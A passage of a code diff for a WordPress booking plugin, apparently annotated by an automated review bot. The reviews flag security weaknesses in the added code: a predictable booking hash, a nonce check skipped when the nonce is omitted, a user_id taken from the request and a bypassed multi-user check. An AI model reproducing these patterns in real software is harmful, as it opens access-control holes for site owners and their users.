+								( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL '" . ( ( 8 * 24 ) + intval( $start_time_arr[0] ) ) . ':' . $start_time_arr[1] . ":01' HOUR_SECOND", 'curdate' ) . " ," . $is_appr . " ),
+								( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL '" . ( ( 8 * 24 ) + intval( $end_time_arr[0]   ) ) . ':' . $end_time_arr[1]   . ":02' HOUR_SECOND", 'curdate' ) . " ," . $is_appr . "  );";
+			$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
 		}
     }
-    make_bk_action( 'wpbc_free_version_activation' );            													// FixIn: 9.3.1.2.
+
+	make_bk_action( 'wpbc_free_version_activation' );

 	// -----------------------------------------------------------------------------------------------------------------
-    // Other versions Activation
+	// Other versions Activation
 	// -----------------------------------------------------------------------------------------------------------------
-    make_bk_action( 'wpbc_other_versions_activation' );
+	make_bk_action( 'wpbc_other_versions_activation' );

-
-    //wpbc_pro_set_default_initial_values();
-
-	// -----------------------------------------------------------------------------------------------------------------
-    wpbc_reindex_booking_db();
+	wpbc_reindex_booking_db();

-    make_bk_action( 'wpbc_after_activation' );
+	make_bk_action( 'wpbc_after_activation' );
 }
 add_bk_action( 'wpbc_activation',  'wpbc_booking_activate' );



-// Deactivate
+// Deactivate.
 function wpbc_booking_deactivate() {

 	// -----------------------------------------------------------------------------------------------------------------
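Review bot: the hash backfill queued at the end of the upgrade branch derives each booking's hash as MD5 of time() joined with wp_rand( 1000, 1000000 ), so every hash minted in one activation shares a single timestamp and differs only in an integer with fewer than 10^6 values; the removed copy of this block marked the column HASH_EDIT, so if the hash gates access to a booking it should come from a CSPRNG, e.g. bin2hex( random_bytes( 16 ) ) or wp_generate_password( 32, false ), and the same applies to the unchanged hash generation elsewhere in the plugin. Two smaller points: the comment "2) Upgrade path: only add missing columns (your current logic)" reads like an assistant's note left in the source and should be reduced to "Upgrade path: add missing columns"; and the $is_insert_test_bookings block is no longer conditioned on the upgrade queue being non-empty, which is harmless while the flag is hardcoded to false but is a behaviour change worth a line in the commit message.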
@@ -530,7 +550,7 @@
  $mu_option4delete[]='booking_is_use_autofill_4_logged_user';

 if ( defined( 'WPBC_NEW_FORM_BUILDER' ) && WPBC_NEW_FORM_BUILDER ) {
-	$default_options['booking_use_bfb_form'] = 'Off';
+	$default_options['booking_use_bfb_form'] = 'On';
 $mu_option4delete[]                      = 'booking_use_bfb_form';
 }
  	// FixIn: 10.13.1.5.
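Review bot: this flips the default of booking_use_bfb_form from 'Off' to 'On' behind WPBC_NEW_FORM_BUILDER, turning the new form builder on for activations where that constant is defined. That is a behaviour change unrelated to the security fix and nothing in the hunk explains it; document it in the changelog and confirm that wpbc_booking_activate only seeds this option when it is absent, so existing sites are not switched over on upgrade.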
--- a/booking/includes/_capacity/create_booking.php
+++ b/booking/includes/_capacity/create_booking.php
@@ -41,20 +41,21 @@
 													'db_option_name'          => 'booking__wpbc_booking_create__request_params',    // Not necessary,  because we not save request, only sanitize it
 													'user_id'                 => $local_params['user_id'],                          // Not necessary,  because we not save request, only sanitize it
 													'request_rules_structure' => array(
-																					'resource_id' => array( 'validate' => 'd', 'default' => 1 ),                     // 'digit_or_csd'
-
-																					'aggregate_resource_id_arr' => array( 'validate' => 'digit_or_csd', 'default' => '' ),
-
-																					'dates_ddmmyy_csv' => array( 'validate' => 'csv_dates', 'default' => '' ),     // FixIn: 9.9.1.1.
-																					'formdata'         => array( 'validate' => 'strong', 'default' => '' ),
-																					'booking_hash'     => array( 'validate' => 'strong', 'default' => '' ),
-																					'custom_form'      => array( 'validate' => 'strong', 'default' => '' ),
-
-																					'captcha_chalange'   => array( 'validate' => 'strong', 'default' => '' ),
-																					'captcha_user_input' => array( 'validate' => 'strong', 'default' => '' ),
-
-																					'is_emails_send' => array( 'validate' => 'd', 'default' => 1 ),
-																					'active_locale'  => array( 'validate' => 'strong', 'default' => '' )
+																					'resource_id'               => array( 'validate' => 'd', 'default' => 1 ),    // 'digit_or_csd'.
+																					'aggregate_resource_id_arr' => array( 'validate' => 'digit_or_csd', 'default'  => '' ),
+																					'dates_ddmmyy_csv'          => array( 'validate' => 'csv_dates', 'default'  => '' ), // FixIn: 9.9.1.1.
+																					'formdata'                  => array( 'validate' => 'strong', 'default'  => '' ),
+																					'booking_hash'              => array( 'validate' => 'strong', 'default'  => '' ),
+																					'custom_form'               => array( 'validate' => 'strong', 'default'  => '' ),
+																					'captcha_chalange'          => array( 'validate' => 'strong', 'default'  => '' ),
+																					'captcha_user_input'        => array( 'validate' => 'strong', 'default'  => '' ),
+																					'is_emails_send'            => array( 'validate' => 'd', 'default' => 1 ),
+																					'active_locale'             => array( 'validate' => 'strong', 'default'  => '' ),
+																					'form_status'               => array( 'validate' => 'strong', 'default'  => 'published' ),
+																					'wpbc_bfb_preview'          => array( 'validate' => 'd', 'default'  => 0 ),
+																					'wpbc_bfb_preview_token'    => array( 'validate' => 'strong', 'default'  => '' ),
+																					'wpbc_bfb_preview_form_id'  => array( 'validate' => 'd', 'default'  => 0 ),
+																					'wpbc_bfb_preview_nonce'    => array( 'validate' => 'strong', 'default'  => '' ),
 																				)
 												));
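Review bot: form_status, wpbc_bfb_preview, wpbc_bfb_preview_token, wpbc_bfb_preview_form_id and wpbc_bfb_preview_nonce are now accepted from the booking request, with form_status defaulting to 'published'. These describe the state of a form on the server; accepting them from the client only sanitizes them ('strong' / 'd'), it does not authorize them. Wherever they are consumed, wpbc_bfb_preview_nonce must be checked with wp_verify_nonce and the caller must be shown to have edit rights on wpbc_bfb_preview_form_id before a non-published form is used to create a booking; otherwise the request itself decides whether it is a preview. Also, 'captcha_chalange' is misspelled (pre-existing) and is worth fixing while this array is being re-aligned.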

@@ -90,20 +91,24 @@
 	// </editor-fold>

 	$server_http_referer_uri = ( ( isset( $_SERVER['HTTP_REFERER'] ) ) ? sanitize_text_field( $_SERVER['HTTP_REFERER'] ) : '' );  /* phpcs:ignore WordPress.Security.NonceVerification.Missing, WordPress.Security.ValidatedSanitizedInput.MissingUnslash */ /* FixIn: sanitize_unslash */
+
 	$request_save_params = array(
-									'resource_id'               => $request_params['resource_id'],
-									'dates_ddmmyy_csv'          => $request_params['dates_ddmmyy_csv'],
-									'form_data'                 => $request_params['formdata'],
-									'aggregate_resource_id_arr' => $request_params['aggregate_resource_id_arr'],        // Optional  can  be ''
-
-									'booking_hash'        => $request_params['booking_hash'],
-									'custom_form'         => $request_params['custom_form'],
-
-									'is_emails_send'       => $request_params['is_emails_send'],
-									'is_show_payment_form' => 1,
-									'user_id'              => $local_params['user_id'],
-									'request_uri'          => $server_http_referer_uri
-							);
+		'resource_id'               => $request_params['resource_id'],
+		'dates_ddmmyy_csv'          => $request_params['dates_ddmmyy_csv'],
+		'form_data'                 => $request_params['formdata'],
+		'aggregate_resource_id_arr' => $request_params['aggregate_resource_id_arr'],        // Optional  can  be ''.
+		'booking_hash'              => $request_params['booking_hash'],
+		'custom_form'               => $request_params['custom_form'],
+		'is_emails_send'            => $request_params['is_emails_send'],
+		'is_show_payment_form'      => 1,
+		'user_id'                   => $local_params['user_id'],
+		'request_uri'               => $server_http_referer_uri,
+		'form_status'               => $request_params['form_status'],
+		'wpbc_bfb_preview'          => $request_params['wpbc_bfb_preview'],
+		'wpbc_bfb_preview_token'    => $request_params['wpbc_bfb_preview_token'],
+		'wpbc_bfb_preview_form_id'  => $request_params['wpbc_bfb_preview_form_id'],
+		'wpbc_bfb_preview_nonce'    => $request_params['wpbc_bfb_preview_nonce'],
+	);
 	$booking_save_arr = wpbc_booking_save( $request_save_params );

 	// <editor-fold     defaultstate="collapsed"                        desc=" :: ERROR :: <-  BOOKING "  >
@@ -255,12 +260,33 @@
 								'is_approve_booking'                => array( 'validate' => 'd',      'default' => 0 ),       // 0 | 1
 								'save_booking_even_if_unavailable'  => array( 'validate' => 'd',      'default' => 0 ),       // 0 | 1
 								'sync_gid'                          => array( 'validate' => 'strong', 'default' => '' ),
-								'is_use_booking_recurrent_time'     => array( 'validate' => 'd',      'default' => intval( ( 'On' === get_bk_option( 'booking_recurrent_time' ) ) ) )
+								'is_use_booking_recurrent_time'     => array( 'validate' => 'd',      'default' => intval( ( 'On' === get_bk_option( 'booking_recurrent_time' ) ) ) ),
+
+								'form_status' => array( 'validate' => 'strong', 'default' => 'published' ),
+								'wpbc_bfb_preview'         => array( 'validate' => 'd',      'default' => 0 ),
+								'wpbc_bfb_preview_token'   => array( 'validate' => 'strong', 'default' => '' ),
+								'wpbc_bfb_preview_form_id' => array( 'validate' => 'd',      'default' => 0 ),
+								'wpbc_bfb_preview_nonce'   => array( 'validate' => 'strong', 'default' => '' ),
 						);
 	$re_cleaned_params = wpbc_sanitize_params_in_arr( $request_params, $validate_arr_rules );

 	$admin_uri = ltrim( str_replace( get_site_url( null, '', 'admin' ), '', admin_url( 'admin.php?' ) ), '/' );         // wp-admin/admin.php?

+	$re_cleaned_params['form_status'] = sanitize_key( $re_cleaned_params['form_status'] );
+	if ( 'preview' !== $re_cleaned_params['form_status'] ) {
+		$re_cleaned_params['form_status'] = 'published';
+	}
+	// FixIn: 2026-02-05 - make preview/published available to form parsing/templates during this request.
+	wpbc_set_request_form_context(
+		array(
+			'form_status'              => $re_cleaned_params['form_status'],
+			'user_id'                  => $re_cleaned_params['user_id'],
+			'wpbc_bfb_preview'         => absint( $re_cleaned_params['wpbc_bfb_preview'] ),
+			'wpbc_bfb_preview_token'   => sanitize_key( $re_cleaned_params['wpbc_bfb_preview_token'] ),
+			'wpbc_bfb_preview_form_id' => absint( $re_cleaned_params['wpbc_bfb_preview_form_id'] ),
+			'wpbc_bfb_preview_nonce'   => (string) $re_cleaned_params['wpbc_bfb_preview_nonce'],
+		)
+	);

 	// -----------------------------------------------------------------------------------------------------------------
 	// Local parameters
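Review bot: wpbc_set_request_form_context() fills $GLOBALS here, but the matching wpbc_clear_request_form_context() is only reached on the normal return path at the end of the function (the `@@ -746,6 +772,7 @@` hunk); any early return, wp_die() or exception between the two leaves the preview context set for the rest of the request, and a later call into wpbc_get__booking_form_data_configuration() in the same request, which reads wpbc_get_request_form_context(), would silently inherit it. Clear the context at the top of this block as well, or wrap the wpbc_booking_save() call in try/finally. Minor: `'wpbc_bfb_preview_nonce' => (string) $re_cleaned_params['wpbc_bfb_preview_nonce']` is the only field stored without sanitize_key()/absint(); a short comment that wp_verify_nonce() needs the raw value would save the next reader a question.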
@@ -746,6 +772,7 @@
 														, - 2 * $php_performance['total'] );                            // PERFORMANCE OTHER - after TOTAL
 																														// </editor-fold>

+	wpbc_clear_request_form_context();

 	return array(	'ajx_data'        => $ajx_data_arr,                         // [ 'status' => "ok", 'wpbc_payment_output' => "<p>Dear John<br..." ]
 					'booking_id'      => $booking_new_arr['booking_id'],        // 254
@@ -1151,6 +1178,21 @@
 			return $insert_dates_arr;
 		}

+// == Help  functions ==
+function wpbc_set_request_form_context( $ctx ) {
+	$GLOBALS['wpbc_request_form_context'] = ( is_array( $ctx ) ) ? $ctx : array();
+}
+
+function wpbc_get_request_form_context() {
+	return ( isset( $GLOBALS['wpbc_request_form_context'] ) && is_array( $GLOBALS['wpbc_request_form_context'] ) )
+		? $GLOBALS['wpbc_request_form_context'] : array();
+}
+
+function wpbc_clear_request_form_context() {
+	if ( isset( $GLOBALS['wpbc_request_form_context'] ) ) {
+		unset( $GLOBALS['wpbc_request_form_context'] );
+	}
+}

 // ---------------------------------------------------------------------------------------------------------------------
 // Support
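Review bot: the three helpers are added without docblocks and without a function_exists() guard, while the resolver in class-fe-form-source-resolver.php calls wpbc_get_request_form_context() only `if ( function_exists( 'wpbc_get_request_form_context' ) )` and wpbc_get__booking_form_data_configuration() calls it unguarded. Pick one: either this file is always loaded (then drop the guard in the resolver) or it is not (then guard the definitions here and in booking_data__parse.php). Also document that the state lives in $GLOBALS['wpbc_request_form_context'] for the current request only and must be paired with wpbc_clear_request_form_context().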
--- a/booking/includes/_functions/booking_data__parse.php
+++ b/booking/includes/_functions/booking_data__parse.php
@@ -1,16 +1,17 @@
 <?php
 /**
-* @version 1.0
-* @package Booking Calendar
-* @subpackage  Booking Data Parsing functions
-* @category    Functions
-*
-* @author wpdevelop
-* @link https://wpbookingcalendar.com/
-* @email info@wpbookingcalendar.com
-*
-* @modified 2024-05-14
-*/
+ * @version     1.0
+ * @package     Booking Calendar
+ * @subpackage  Booking Data Parsing functions
+ * @category    Functions
+ *
+ * @author      wpdevelop
+ * @link        https://wpbookingcalendar.com/
+ * @email info@wpbookingcalendar.com
+ *
+ * @modified    2024-05-14
+ * @file        ../includes/_functions/booking_data__parse.php
+ */

 if ( ! defined( 'ABSPATH' ) ) exit;                                             // Exit if accessed directly

@@ -272,7 +273,7 @@
 				);
 	$params   = wp_parse_args( $params, $defaults );

-	$booking_form_show = wpbc_get__booking_form_data_configuration( $resource_id, $form_data );
+	$booking_form_show = wpbc_get__booking_form_data_configuration( $resource_id, $form_data, $params );

 	$booking_data_arr  = wpbc_get_parsed_booking_data_arr( $form_data, $resource_id, array( 'get' => 'value' ) );

@@ -396,6 +397,50 @@
 	return $booking_form_configuration;
 }

+
+/**
+ * Load BFB preview payload from transient (for booking created inside preview iframe).
+ *
+ * @param array $ctx
+ * @return array|null
+ */
+function wpbc_bfb_preview__maybe_get_payload_from_context( $ctx ) {
+
+	$ctx = ( is_array( $ctx ) ) ? $ctx : array();
+
+	$user_id = isset( $ctx['user_id'] ) ? absint( $ctx['user_id'] ) : 0;
+	$form_id = isset( $ctx['wpbc_bfb_preview_form_id'] ) ? absint( $ctx['wpbc_bfb_preview_form_id'] ) : 0;
+	$token   = isset( $ctx['wpbc_bfb_preview_token'] ) ? sanitize_key( $ctx['wpbc_bfb_preview_token'] ) : '';
+	$nonce   = isset( $ctx['wpbc_bfb_preview_nonce'] ) ? sanitize_text_field( $ctx['wpbc_bfb_preview_nonce'] ) : '';
+
+	if ( $user_id <= 0 || $form_id <= 0 || '' === $token ) {
+		return null;
+	}
+
+	// Optional hardening: verify nonce if present.
+	if ( '' !== $nonce ) {
+		if ( ! wp_verify_nonce( $nonce, 'wpbc_bfb_preview_' . $token ) ) {
+			return null;
+		}
+	}
+
+	// Optional hardening: capability check (preview is admin-only anyway).
+	$cap = ( function_exists( 'wpbc_bfb_get_manage_cap' ) ) ? wpbc_bfb_get_manage_cap() : 'manage_options';
+	if ( ! is_user_logged_in() || ! current_user_can( $cap ) ) {
+		return null;
+	}
+
+	$transient_key = 'wpbc_bfb_preview_' . $user_id . '_' . $form_id . '_' . $token;
+
+	$data = get_transient( $transient_key );
+	if ( empty( $data ) || ! is_array( $data ) ) {
+		return null;
+	}
+
+	return $data;
+}
+
+
 /**
  * Get configuration  of 'BOOKING FORM DATA'  from  -  Booking > Settings > Form page
  *
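Review bot: the `Optional hardening: verify nonce if present` block in wpbc_bfb_preview__maybe_get_payload_from_context() is not hardening: the nonce arrives in the same request as the token (`wpbc_bfb_preview_nonce`, validated only as 'strong' in the save rules), so a caller who wants to skip verification simply omits it and `'' !== $nonce` is false. Either require the nonce whenever form_status is preview, or drop the block and rely on the current_user_can( $cap ) check that follows, which is the real gate. Relatedly, the transient key `'wpbc_bfb_preview_' . $user_id . '_' . $form_id . '_' . $token` is built from `$ctx['user_id']`, which comes from the sanitized request parameters in wpbc_booking_save(), not from get_current_user_id(); once the current user has passed the capability check they can load another user's preview payload by changing user_id. Keying on get_current_user_id() would make the payload per-session, as the function name suggests.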
@@ -410,13 +455,49 @@
  *
  * @return string
  */
-function wpbc_get__booking_form_data_configuration( $resource_id = 1, $form_data = '' ) {
+/**
+ * Get configuration  of 'BOOKING FORM DATA'  from  -  Booking > Settings > Form page
+ *
+ *        - 1.    <= BS : 'Booking form show' configuration    from standard form in versions up to  Business Small version ,
+ *        - 2     >= BM : If form data has field of custom form, then from custom form configuration,
+ *        - 3     >= BM : Otherwise if resource has default custom  booking form,  then  from  this default custom  booking form
+ *        - 4      = MU :  specific form of specific WP User
+ *        - 5   finally : simple standard form
+ *
+ * @param int    $resource_id
+ * @param string $form_data  Form data here, required in >= BM.
+ *
+ * @return string
+ */
+function wpbc_get__booking_form_data_configuration( $resource_id = 1, $form_data = '', $params = array() ) {
+
+	// FixIn: 2026-02-05 - allow preview booking submissions to use preview "content_form".
+	$ctx = wp_parse_args( ( is_array( $params ) ? $params : array() ), wpbc_get_request_form_context() );
+
+	$form_status = ( isset( $ctx['form_status'] ) ) ? sanitize_key( $ctx['form_status'] ) : 'published';
+
+	if ( 'preview' === $form_status ) {
+
+		$payload = wpbc_bfb_preview__maybe_get_payload_from_context( $ctx );
+
+		// content_form is exactly the "Booking form show" template exported for preview session.
+		if ( ! empty( $payload ) && isset( $payload['content_form'] ) && ( '' !== (string) $payload['content_form'] ) ) {
+			return (string) $payload['content_form'];
+		}
+	}
+
+	$resource_id          = (int) $resource_id;
+	$form_data            = (string) $form_data;
+	$my_booking_form_name = 'standard';

 	if ( ! class_exists( 'wpdev_bk_personal' ) ) {

 		$booking_form_show = wpbc_simple_form__get_form_show__as_shortcodes();
 		$booking_form_show = wpbc_bf__replace_custom_html_shortcodes( $booking_form_show );

+		// Try BFB (if available) even in this branch (safe no-op if not loaded).
+		$booking_form_show = WPBC_BFB_Booking_Data_Content_Resolver::maybe_override_booking_form_show_by_bfb( $booking_form_show, $resource_id, $my_booking_form_name, $form_data, $ctx );
+
 	} else {

 		$booking_form_show = get_bk_option( 'booking_form_show' );
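Review bot: `WPBC_BFB_Booking_Data_Content_Resolver::maybe_override_booking_form_show_by_bfb( ... )` is a static call with no class_exists() guard, so the comment `safe no-op if not loaded` is wrong: if class-fe-form-source-resolver.php is not loaded PHP raises a fatal "Class not found", not a no-op (compare wpbc_get__booking_form_pair__for_field_names_listing() later in this file, which does guard with class_exists()). Wrap the call or make the resolver file an unconditional include. Two smaller points: the function now carries two consecutive docblocks (the old ` * @return string */` tail is kept directly above the new `/** ... */`), and the new one does not document the added `$params` argument; and the early `return (string) $payload['content_form'];` for the preview payload skips the wpbc_lang() call at the bottom of the function, whereas the same payload path in the resolver class applies wpbc_bf__replace_custom_html_shortcodes() and wpbc_lang() before returning.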
@@ -424,34 +505,53 @@

 		if ( class_exists( 'wpdev_bk_biz_m' ) ) {

-			if ( false !== strpos( $form_data, 'wpbc_custom_booking_form' . $resource_id . '^' ) ) {                        // FixIn: 9.4.3.12.
+			if ( false !== strpos( $form_data, 'wpbc_custom_booking_form' . $resource_id . '^' ) ) { // FixIn: 9.4.3.12.
+
+				$custom_booking_form_name = substr(
+					$form_data,
+					strpos( $form_data, 'wpbc_custom_booking_form' . $resource_id . '^' ) + strlen( 'wpbc_custom_booking_form' . $resource_id . '^' )
+				);

-				$custom_booking_form_name = substr( $form_data, strpos( $form_data, 'wpbc_custom_booking_form' . $resource_id . '^' ) + strlen( 'wpbc_custom_booking_form' . $resource_id . '^' ) );
 				if ( false !== strpos( $custom_booking_form_name, '~' ) ) {
 					$custom_booking_form_name = substr( $custom_booking_form_name, 0, strpos( $custom_booking_form_name, '~' ) );
 				}
+
 				$booking_form_show    = apply_bk_filter( 'wpdev_get_booking_form_content', $booking_form_show, $custom_booking_form_name );
 				$my_booking_form_name = $custom_booking_form_name;
+
 			} else {

-				// BM :: Get default Custom Form  of Resource
+				// BM :: Get default Custom Form of Resource.
 				$my_booking_form_name = apply_bk_filter( 'wpbc_get_default_custom_form', 'standard', $resource_id );
 				if ( ( $my_booking_form_name != 'standard' ) && ( ! empty( $my_booking_form_name ) ) ) {
 					$booking_form_show = apply_bk_filter( 'wpdev_get_booking_form_content', $booking_form_show, $my_booking_form_name );
 				}
 			}

-			//MU :: if resource of "Regular User" - then  GET STANDARD user form ( if ( get_bk_option( 'booking_is_custom_forms_for_regular_users' ) !== 'On' ) )
-			$booking_form_show = apply_bk_filter( 'wpbc_multiuser_get_booking_form_show_of_regular_user', $booking_form_show, $resource_id, $my_booking_form_name );    // FixIn: 8.1.3.19.
+			// MU :: if resource of "Regular User" - then GET STANDARD user form.
+			$booking_form_show = apply_bk_filter( 'wpbc_multiuser_get_booking_form_show_of_regular_user', $booking_form_show, $resource_id, $my_booking_form_name ); // FixIn: 8.1.3.19.
+
+			/**
+			 * IMPORTANT:
+			 * Try BFB DB "content_form" (resolver-driven) BEFORE MU regular-user override,
+			 * so MU filter can still enforce standard form when required.
+			 */
+			$booking_form_show = WPBC_BFB_Booking_Data_Content_Resolver::maybe_override_booking_form_show_by_bfb( $booking_form_show, $resource_id, $my_booking_form_name, $form_data, $ctx );
+
+		} else {
+
+			// Try BFB also for non-BM paid branches (safe).
+			$booking_form_show = WPBC_BFB_Booking_Data_Content_Resolver::maybe_override_booking_form_show_by_bfb( $booking_form_show, $resource_id, $my_booking_form_name, $form_data, $ctx );
 		}
 	}

-	// Language
+	// Language.
 	$booking_form_show = wpbc_lang( $booking_form_show );

 	return $booking_form_show;
 }

+
 // -------------------------------------------------------------------------------------------------------------

 /**
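Review bot: the IMPORTANT comment says the BFB content_form is tried `BEFORE MU regular-user override, so MU filter can still enforce standard form when required`, but the code does the opposite: `apply_bk_filter( 'wpbc_multiuser_get_booking_form_show_of_regular_user', ... )` runs first and the resolver call comes after it, so the BFB template overrides whatever the MU filter decided. Either move the resolver call above the apply_bk_filter() line or fix the comment, depending on which behaviour is intended; as written the MU enforcement is bypassed for BFB forms. Also, the same unguarded static call now appears three times in this function (one per branch); a single guarded call after the if/else would remove the duplication.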
@@ -473,6 +573,62 @@
 	return $new__form_data__str;
 }

+/**
+ * Get booking form pair (fields + show template) for listing/inspection purposes,
+ * but allow BFB resolver to override legacy options.
+ *
+ * @param int    $resource_id
+ * @param string $form_name
+ * @param array  $ctx
+ *
+ * @return array { form:string, content:string }
+ */
+function wpbc_get__booking_form_pair__for_field_names_listing( $resource_id = 1, $form_name = 'standard', $ctx = array() ) {
+
+	$pair = array(
+		'form'    => wpbc_bf__replace_custom_html_shortcodes( get_bk_option( 'booking_form' ) ),
+		'content' => wpbc_bf__replace_custom_html_shortcodes( get_bk_option( 'booking_form_show' ) ),
+	);
+
+	// Let BFB override both "form" and "content" if available.
+	if ( class_exists( 'WPBC_BFB_Booking_Data_Content_Resolver' ) ) {
+
+		// Recommended: add this method to the resolver (see section 3 below).
+		if ( method_exists( 'WPBC_BFB_Booking_Data_Content_Resolver', 'maybe_override_booking_form_pair_by_bfb' ) ) {
+			$pair = WPBC_BFB_Booking_Data_Content_Resolver::maybe_override_booking_form_pair_by_bfb(
+				$pair,
+				(int) $resource_id,
+				(string) $form_name,
+				'',       // no form_data here
+				(is_array( $ctx ) ? $ctx : array())
+			);
+		} else {
+			// Fallback: at least keep content resolved by BFB (you already have this method).
+			if ( method_exists( 'WPBC_BFB_Booking_Data_Content_Resolver', 'maybe_override_booking_form_show_by_bfb' ) ) {
+				$pair['content'] = WPBC_BFB_Booking_Data_Content_Resolver::maybe_override_booking_form_show_by_bfb(
+					$pair['content'],
+					(int) $resource_id,
+					(string) $form_name,
+					'',
+					(is_array( $ctx ) ? $ctx : array())
+				);
+			}
+		}
+	}
+
+	// Normalize keys.
+	if ( ! isset( $pair['form'] ) ) {
+		$pair['form'] = '';
+	}
+	if ( ! isset( $pair['content'] ) ) {
+		$pair['content'] = '';
+	}
+
+	$pair['form']    = (string) $pair['form'];
+	$pair['content'] = (string) $pair['content'];
+
+	return $pair;
+}

 /**
  * Get arr   of all Fields Names 	from  all booking forms  (including custom)
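Review bot: the primary branch of wpbc_get__booking_form_pair__for_field_names_listing() is dead code: it looks for WPBC_BFB_Booking_Data_Content_Resolver::maybe_override_booking_form_pair_by_bfb(), which the resolver class added in this patch does not define (it only has maybe_override_booking_form_show_by_bfb() and two private helpers), so execution always falls through to the method_exists() fallback and `$pair['form']` is never overridden by BFB. Either add the method or drop the branch. The comments `Recommended: add this method to the resolver (see section 3 below)` and `you already have this method` read like notes from a design discussion rather than code comments and should not ship.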
@@ -515,7 +671,17 @@
 function wpbc_get__in_all_forms__field_names_arr() {

 	$booking_form_fields_arr   = array();
-	$booking_form_fields_arr[] = array( 'name' => 'standard', 'form' => wpbc_bf__replace_custom_html_shortcodes( get_bk_option( 'booking_form' ) ), 'content' => wpbc_bf__replace_custom_html_shortcodes( get_bk_option( 'booking_form_show' ) ) );
+	$ctx = wpbc_get_request_form_context();
+
+	$ctx['form_status'] = 'published';
+
+	$pair = wpbc_get__booking_form_pair__for_field_names_listing( 1, 'standard', $ctx );
+
+	$booking_form_fields_arr[] = array(
+		'name'    => 'standard',
+		'form'    => $pair['form'],
+		'content' => $pair['content'],
+	);

 	/**
 	 * Get custom booking form configurations: [
--- a/booking/includes/_functions/versions.php
+++ b/booking/includes/_functions/versions.php
@@ -444,7 +444,8 @@
 						'upgrade_link' 		 => array( 'title' => 'Upgrade to Pro', 'relative_url' => 'features/#bk_news_section' ),
 						'versions'     		 => 'Business Large, MultiUser versions',
 						'css'          		 => 'transform: translate(0) translateY(120px);',
-						'dismiss_css_class'  => ''																//'.wpbc_random_' . round( microtime( true ) * 1000 ), //'.'.$id . '_' . 'weekdays_conditions'
+						'dismiss_css_class'  => '',																//'.wpbc_random_' . round( microtime( true ) * 1000 ), //'.'.$id . '_' . 'weekdays_conditions'
+						'no_dismiss'         => false
 				);
 	$params = wp_parse_args( $params, $defaults );
 	$up_id = $params['id'];
@@ -457,18 +458,23 @@

 	if ( $is_blured ) {

-		// ---------------------------------------------------------------------------------------------------------
-		// Is dismissed ?
-		// ---------------------------------------------------------------------------------------------------------
-		ob_start();
-		$is_upgrade_panel_visible = wpbc_is_dismissed( $up_id , array(
-																	'title' => '<span aria-hidden="true" style="font-size: 28px;">×</span>',
-																	'hint'  => __( 'Dismiss', 'booking' ),
-																	'class' => 'wpbc_panel_get_started_dismiss',
-																	'css'   => '',
-																	'dismiss_css_class' => $params['dismiss_css_class']
-															) );
-		$html_dismiss_btn = ob_get_clean();
+		if ( $params['no_dismiss'] ) {
+			$is_upgrade_panel_visible = true;
+			$html_dismiss_btn         = '';
+		} else {
+			// ---------------------------------------------------------------------------------------------------------
+			// Is dismissed ?
+			// ---------------------------------------------------------------------------------------------------------
+			ob_start();
+			$is_upgrade_panel_visible = wpbc_is_dismissed( $up_id , array(
+																		'title' => '<span aria-hidden="true" style="font-size: 28px;">×</span>',
+																		'hint'  => __( 'Dismiss', 'booking' ),
+																		'class' => 'wpbc_panel_get_started_dismiss',
+																		'css'   => '',
+																		'dismiss_css_class' => $params['dismiss_css_class']
+																) );
+			$html_dismiss_btn = ob_get_clean();
+		}

 		// ---------------------------------------------------------------------------------------------------------
 		// Upgrade Widget
--- a/booking/includes/fontend/class-fe-form-source-resolver.php
+++ b/booking/includes/fontend/class-fe-form-source-resolver.php
@@ -70,7 +70,6 @@
 	 *  - resource_id (int)
 	 *  - form_slug (string)  // from shortcode form_type
 	 *  - form_status (string) // published|preview
-	 *  - context (string) // frontend|preview|backend (optional)
 	 *  - custom_params (array) // parsed from options parser
 	 *  - legacy_instance (wpdev_booking|null) // optional
 	 *
@@ -91,7 +90,6 @@
 		$resource_id     = isset( $req['resource_id'] ) ? (int) $req['resource_id'] : 0;
 		$form_slug_raw   = isset( $req['form_slug'] ) ? (string) $req['form_slug'] : '';
 		$form_status_raw = isset( $req['form_status'] ) ? (string) $req['form_status'] : '';
-		$context         = isset( $req['context'] ) ? sanitize_key( (string) $req['context'] ) : 'frontend';
 		$custom_params   = ( isset( $req['custom_params'] ) && is_array( $req['custom_params'] ) ) ? $req['custom_params'] : array();

 		$legacy_instance = isset( $req['legacy_instance'] ) ? $req['legacy_instance'] : null;
@@ -99,23 +97,13 @@
 		// ---------------------------------------------------------------------
 		// Step A: determine slug + status (contract).
 		// ---------------------------------------------------------------------
-		$form_slug = sanitize_key( $form_slug_raw );
+		$form_slug = sanitize_text_field( $form_slug_raw );
 		if ( '' === $form_slug ) {
 			$form_slug = 'standard';
 		}

 		$status = sanitize_key( $form_status_raw );

-		// Backward compat: if no explicit status but options/context says preview.
-		if ( '' === $status ) {
-			if ( ( ! empty( $custom_params['context'] ) ) && ( 'preview' === sanitize_key( (string) $custom_params['context'] ) ) ) {
-				$status = 'preview';
-			}
-		}
-		if ( '' === $status && 'preview' === $context ) {
-			$status = 'preview';
-		}
-
 		// Normalize synonyms.
 		if ( in_array( $status, array( 'publish', 'published' ), true ) ) {
 			$status = 'published';
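Review bot: `$form_slug = sanitize_text_field( $form_slug_raw );` (and the same change in try_find_row() below) replaces sanitize_key(), which restricts the slug to lowercase [a-z0-9_-], with a sanitizer that keeps spaces, quotes and most punctuation. The slug is a DB lookup key in try_find_row(); the query itself is not in this diff, so please confirm it goes through $wpdb->prepare(), and if the wider charset is needed for legacy custom form names (the `wpbc_custom_booking_form{id}^{name}` values parsed in booking_data__parse.php) say so in a comment, since the loosening is easy to misread as an accident. Separately, dropping the `context => preview` backward-compat inference means callers that still pass context (or custom_params['context']) without form_status now silently resolve to published; that deserves a changelog line.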
@@ -132,7 +120,7 @@
 		}

 		// If BFB runtime is not present => legacy only.
-		if ( ! function_exists( 'wpbc_bfb_get_booking_form_source' ) ) {
+		if ( ! class_exists( 'WPBC_BFB_Form_Loader' ) ) {
 			return self::fallback_to_legacy_or_simple( $legacy_instance );
 		}

@@ -182,7 +170,7 @@
 			$req
 		);

-		// Try: (slug,status,owner_user_id) then (slug,status,global)
+		// Try: (slug,status,owner_user_id) then (slug,status,global)   Return like this:     $found = [ "form_id":1,  "form_slug":"standard",  "status":"published",  "owner_user_id":0 ]
